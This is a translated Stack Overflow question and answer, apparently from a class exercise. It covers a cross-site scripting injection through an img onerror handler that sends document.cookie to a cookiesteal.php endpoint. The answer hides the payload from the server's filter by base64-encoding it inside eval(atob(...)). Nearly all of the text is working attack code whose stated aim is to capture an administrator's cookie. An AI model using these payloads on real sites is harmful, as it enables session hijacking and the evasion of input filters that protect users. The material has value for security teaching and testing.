我正在尝试为一个任务做一个XSS攻击,注入一些代码,然而服务器被设置为剥离大多数超文本标记语言标签,但我能够使用img标签和onerror注入。在注入时,我似乎不能得到正确的语法,因为它去掉了我的字符串append中的"+“(试图将cookie附加到我正在使用的源代码)。
<img src="img.gif"
onerror="var img = document.createElement('img'); img.src='http://localhost/cookiesteal.php?cookie='+ document.cookie;">当我在注入后检查这个(在inspect元素中)时,它显示了脚本,但末尾的加号丢失了。有没有其他方法可以在不使用+的情况下将这个cookie附加到img.src?
更新:
我得到了加号,现在事件监听器已经激活了。但是我尝试了使用onerror,onload,onmouseover,但是没有任何东西激活代码,我没有收到管理cookie。
发布于 2019-05-24 13:46:20
在出错时尝试此操作
eval(atob('dmFyIGltZyA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2ltZycpOwoJIGltZy5zcmM9J2h0dHA6Ly9sb2NhbGhvc3QvY29va2llc3RlYWwucGhwP2Nvb2tpZT0nKyBkb2N1bWVudC5jb29raWU7'))我所做的一切
btoa()
eval(atob('encoded code'));作为代码执行,但我们需要首先对其进行解码,因此
编码后的代码
`var img = document.createElement('img');
img.src='http://localhost/cookiesteal.php?cookie='+ document.cookie;`所以你的终端应该看起来像
<img src="img.gif" onerror="eval(atob('dmFyIGltZyA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2ltZycpOwoJIGltZy5zcmM9J2h0dHA6Ly9sb2NhbGhvc3QvY29va2llc3RlYWwucGhwP2Nvb2tpZT0nKyBkb2N1bWVudC5jb29raWU7'))">https://stackoverflow.com/questions/56286351
复制相似问题